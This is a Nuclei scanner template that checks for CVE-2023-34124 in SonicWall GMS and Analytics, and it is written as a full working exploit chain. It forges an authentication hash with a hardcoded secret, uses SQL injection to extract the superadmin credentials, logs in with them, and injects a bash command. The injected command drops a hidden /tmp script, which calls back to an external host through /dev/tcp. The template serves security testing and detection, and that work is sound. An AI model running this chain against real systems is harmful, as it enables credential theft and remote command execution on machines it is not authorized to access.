95 lines
4.3 KiB
YAML
95 lines
4.3 KiB
YAML
id: CVE-2023-34124
|
|
|
|
info:
|
|
name: SonicWall GMS and Analytics Web Services - Shell Injection
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: critical
|
|
description: |
|
|
The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability.
|
|
reference:
|
|
- https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
|
|
- https://attackerkb.com/topics/Vof5fWs4rx/cve-2023-34127/rapid7-analysis
|
|
- https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/
|
|
- https://github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-34124
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-34124
|
|
cwe-id: CWE-287,CWE-305
|
|
epss-score: 0.01627
|
|
epss-percentile: 0.8606
|
|
cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 4
|
|
vendor: sonicwall
|
|
product: analytics
|
|
shodan-query: http.favicon.hash:-1381126564
|
|
tags: cve,cve2023,sonicwall,shell,injection,auth-bypass,instrusive
|
|
variables:
|
|
callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80"
|
|
query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '"
|
|
secret: '?~!@#$%^^()'
|
|
auth: "{{hmac('sha1', query, secret)}}"
|
|
filename: "{{rand_base(5)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Auth: {"user": "system", "hash": "{{base64(hex_decode(auth))}}"}
|
|
- |
|
|
GET /appliance/login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /appliance/applianceMainPage HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,"^.*:",""))) }}&password={{replace_regex(alias,"^.*:","")}}&applianceUser={{replace_regex(alias,":.*$","")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0
|
|
- |
|
|
POST /appliance/applianceMainPage HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
num=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\$\(echo\+-e\+begin-base64\+755\+a\\\\nKwee\\\\n\%3d\%3d\%3d\%3d\+\|\+uudecode\+-o-\)\%3becho\+-e\+begin-base64\+755\+/tmp/.{{filename}}\\\\n{{replace(base64(callback),"+","${PLUS}")}}\\\\n\%3d\%3d\%3d\%3d\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+
|
|
|
|
cookie-reuse: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_3
|
|
words:
|
|
- "<title>SonicWall Universal Management Appliance</title>"
|
|
- "<title>SonicWall Universal Management Host</title>"
|
|
condition: or
|
|
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
|
|
extractors:
|
|
- type: json
|
|
part: body
|
|
internal: true
|
|
name: alias
|
|
group: 1
|
|
json:
|
|
- '.alias'
|
|
|
|
- type: regex
|
|
part: body
|
|
internal: true
|
|
name: servertoken
|
|
group: 1
|
|
regex:
|
|
- "getPwdHash.*,'([0-9]+)'"
|
|
|
|
# digest: 4b0a00483046022100c6b80ef746b8bb30eeb608e5e65faf3c48cd08f0571a2070aa89a628ecda1f47022100bab8b0e1c71e8c6e82060afb8675323a90fdb54b2bbe1a6ed1f64940f18b1aa1:922c64590222798bb761d5b6d8e72950
|